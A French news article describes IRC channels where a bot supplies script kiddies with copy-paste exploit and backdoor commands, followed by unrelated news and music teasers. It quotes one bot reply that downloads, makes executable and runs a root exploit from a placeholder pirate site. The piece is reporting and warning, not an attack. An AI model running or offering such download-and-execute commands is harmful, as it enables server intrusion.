On connaissait les logiciels trouvés sur la toile qui permettaient
de casser un mot de passe, d'espionner, dans certaines conditions, un internaute.
Voici venir le chan IRC qui diffuse, à qui le souhaite, les méthodes,
exploits et backdoors permettant le piratage. En un seul clic le massacre peut
commencer. Par Damien Bancal
Ils s'appellent Piratax, Fr0z3nz, Stoopix, SlackWar3. Le point commun de ces
internautes, ainsi que de plusieurs centaines d'autres est de se retrouver sur
des chans IRC afin de récupérer des informations dédiées
au piratage de serveurs Internet. Culture informatique proche du zéro,
ils l'avouent eux-mêmes, ils n'ont jamais rien créé mais
ont tous le même rêve : devenir un grand hacker. Pour espérer
atteindre ce qui reste un éternel fantasme dans l'esprit d'une certaine
catégorie d'internautes, il faut accéder aux exploits. Pour cela
il y a deux contraintes : la première est de comprendre le code source
de l'exploit utilisé et de le modifier à sa convenance si besoin
est. La seconde est d'être capable d'utiliser un exploit publié
(compilé parfois) afin de s'ouvrir les portes d'un serveur ou d'un site
internet. Seulement aujourd'hui, il est possible de modifier une page web, ou
d'accéder à un serveur dédié, sans même bouger
le moindre petit neurone.
![]() |
Pièges automatisés
Sur l'un des chans IRC découvert, le bot, un robot permettant d'automatiser
certaines actions, est d'une gentillesse à toute épreuve. Selon
les commandes envoyées, il propose l'exploit correspondant au mot-clé
envoyé ainsi que les commandes à copier- coller pour utiliser
celui-ci. Pour ce faire, le pirate qui a mis en place ce lieu de discussion
particulier, a infiltré plusieurs serveurs web. Il y a placé des
exploits publics, et certains privés, baptisés des "0days",
qui permettent d'agir selon le mot-clé spécifié. "Ils
vont télécharger des versions compilées d'un exploit, il
ne reste plus qu'à l'exécuter, explique un utilisateur français.
Moi, ça me permet de tenir à jour la base de données dédiée
à la sécurité des clients de l'entreprise qui m'emploie."
L'effet est effectivement saisissant.
Les pirates tapent par exemple une commande " !uselib ". Le bot du
channel analyse dans sa base de données. Il recherche un exploit correspondant
à ce service. Il n'en n'a pas, il renvoie évidemment une erreur.
En revanche, dans le cas où il est en possession d'un exploit correspondant
à ce service, il renvoie une ligne qui ressemble à celle-là
: "wget www.sitepirate.com/0days/uselib; chmod 777 uselib ; ./uselib".
Celui-ci communique l'endroit où est stocké l'exploit ainsi que
la commande système pour le télécharger. Il permet de changer
les droits de l'exploit une fois téléchargé, et donc de
l'exécuter. Le pirate n'a donc plus qu'à copier cette ligne afin
de devenir root, comprenez l'administrateur de la machine ciblée.
![]() |
Le bot va nettement plus loin puisqu'il répond à
la commande " !backdoor", il permet, une fois l'exploit téléchargé
et exécuté, de refaire le même processus, cette fois avec
les privilèges administrateurs pour installer une backdoor, comprenez
une porte dérobée, afin de créer un accès sur la
machine piratée. Cet accès va lui permettre d'y revenir plus tard.
Cette backdoor est généralement en Perl ou compilée.
L'exemple "uselib" est assez probant, dans le sens où cet exploit
existe vraiment pour la librairie en question. Il est donc possible d'utiliser
l'exploit en 1 seconde en copiant les lignes données par le bot. Un accès
de Calife à la place du Calife et cela en à peine 4 secondes.
"Ce genre d'espace est un véritable nid à pirates,
explique John Jean, directeur de la société de sécurité
informatique "Wargan solutions". En effet, la plupart des personnes
exécutant ces binaires ne connaissent même pas le code source de
ceux-ci, et encore moins leur fonctionnement. Il se peut qu'en créant
un accès sur une machine, ils en créent également un à
celui qui met à disposition ces binaires. Du piratage ou accès
à un serveur à la portée de tous." Même
plus besoin de réfléchir à l'acte. Seul le résultat
compte. Une démocratisation du piratage qui risque d'entraîner
des vagues d'arrestations dans les chambrées de ces internautes qui rêvaient
tant d'être de grands pirates. "Avant, j'aidais les webmasters,
explique l'un d'eux, Je n'avais même pas de merci. Aujourd'hui, au
moins, je suis respecté". Le réveil risque d'être
violent !
![]() |
a>
Exclu : Une page dédié à la banque Halifax cachée à l´insu du plein grès du Comité d'Entreprise du fabricant de pneu GoodYear, à Amiens.
Une panne de courant plonge plusieurs centaines de sites Internet Français dans le noir dont Dailymotion, le portail vidéo.
La police internationale intègre le cercle du Forum of Incident Response and Security Teams, FIRST.
Un internaute souhaitait lancer une attaque informatique lors de la fête nationale américaine du 4 juillet. Il passera son Independance Day entre quatre murs.
Mercredi matin, les forces de l´ordre française auraient sonné chez de nouveaux administrateurs et uploaders du site Wawa Mania.
Périphériques de stockage amovibles : une menace réelle pour la sécurité des informations en entreprises. Une tribune d´Alexei Lesnykh, Responsable du Développement International et de la Stratégie Produit de DeviceLock.
Un widget vous permet de suive en temps réel les attaques informatiques en cours.
Les ayants droits américains font condamner Usenet. La justice estime que Usenet est directement coupable de violation de la propriété intellectuelle.
Exclusif : Un appel au piratage des sites Internet Iraniens a été lancé par des hacktivistes. Ces derniers proposent de faire taire un gouvernement fasciste.
Le pirate du tracker Guiks.net diffuse sur Internet de nouvelles informations concernant les administrateurs de ce site diffuseur de contrefaçons.
Guiks.net, un tracker privé de téléchargement de fichiers piratés se retrouve avec ses informations dévoilées sur Internet.
A french hacker has find a security vulnerability into Facebook permitting to retreive all credentials of Facebook users
Le blog du Parti de droite souverainiste dirigé par Philippe de Villiers, Mouvement pour la France piraté.
Un groupe de pirates informatiques qui se dit iranien a caché un message sur le site Internet du laboratoire pharmaceutique Pfizer France.
Dmitriy Guzner, 19 ans, risque 10 ans de prison pour avoir lancé une attaque à l´encontre de l´Église de Scientologie.
L´un des fondateurs de The Pirate Bay aurait trouvé un moyen de frapper les chasseurs de pirates. Une attaque directe dans le porte-monnaie de l'IFPI.
Le groupe de protection sociale Vauban Humanis lance le premier site de localisation de défibrillateurs en France.
BitDefender a le plaisir d´annoncer pour la première fois la disponibilité en langue française de la version bêta de sa solution de sécurité BitDefender Total Security 2010.
RapidShare donne l´accès à son interface de programmation d´applications. Celle-ci permettra aux développeurs privés et professionnels d´intégrer rapidement et facilement la technologie RapidShare dans leurs outils.
Virgin Mobile révolutionne le marché et lance les premiers forfaits vraiment illimités.
« J?ai juste envie de parler aux gens », dit Clara Plume. Et elle parle ! C?est d?ailleurs de la parole qu?elle vient : enfance à la fois classique et bohème, encouragée à écrire aussi naturellement qu?elle lit, et à s?exprimer aussi passionnément qu?elle écoute. Elle devient comédienne, monte des pièces, en écrit, les jette, [...]
Better Days a été produit par Plutonic Lab pendant le séjour de Speech en Australie. Après plusieurs idées de featuring, elle s?est finalement décidée pour Micachu qui a su insuffler sa touche brit-pop unique au titre. Le résultat est dément. Le son est chaleureux, groovy, sensuel. Le beat funky contraste avec la profondeur de la contrebasse [...]
Marie Espinosa marquée par Jane Birkin et Françoise Hardy sortira son premier album à la rentrée chez Remark (ULM/Universal Music). Une galette suave baptisée « La démarrante » et qui annonce un son mélodieux. C’est du moins ce que nous a fait saliver de plaisir le premier single de la belle, « Charmante jeune fille [...]
Street Hero ? Saut sur un bus avec caméra embarquée ? Saut freestyle d?un immeuble sur des bus en caméra embarquée. A voir ! Des bus, un immeuble et un jeune sautillant Yamakazi à la sauce anglaise. Etonnant, c’est le buzz vidéo du moment. Soleil, fun et juillet, voilà une période ou l’on peut se lacher un peu [...]